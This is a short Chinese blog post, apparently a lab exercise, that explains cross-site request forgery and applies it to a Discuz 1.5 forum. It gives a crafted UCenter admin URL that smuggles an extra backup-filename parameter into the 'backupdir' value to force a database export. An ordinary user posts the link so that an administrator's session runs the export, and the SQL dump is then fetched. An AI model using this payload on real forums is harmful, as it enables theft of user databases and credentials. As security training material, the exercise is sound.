CSRF练习之discuz1.5论坛脱裤
2019-07-15 本文已影响0人
表弟_212

- 用户C打开浏览器,访问受信任网站A,输入用户名和密码请求登录网站A;
2.在用户信息通过验证后,网站A产生Cookie信息并返回给浏览器,此时用户登录网站A成功,可以正常发送请求到网站A;- 用户未退出网站A之前,在同一浏览器中,打开一个TAB页访问网站B;
- 网站B接收到用户请求后,返回一些攻击性代码,并发出一个请求要求访问第三方站点A>;
- 浏览器在接收到这些攻击性代码后,根据网站B的请求,在用户不知情的情况下携带Cookie信息,向网站A发出请求。网站A并不知道该请求其实是由B发起的,所以会根据用户C的Cookie信息以C的权限处理该请求,
导致来自网站B的恶意代码被执行。
通过以上的攻击原理描述个人总结CSRF两个侧重点:
1、CSRF的攻击建立在浏览器与Web服务器的会话之中。
2、欺骗用户访问URL
1 :抓包构造存储文件路径
-
默认存储路径
image.png
- 构造存储路径
http://192.168.17.69:8989/dzcsrt/uc_server/admin.php?m=db&a=operate&t=export&appid=0&backupdir=xxxx%26backupfilename%3Daaaa
普通用户拿构造好的链接进行发表


已生成 ,根据路径扒取SQL数据
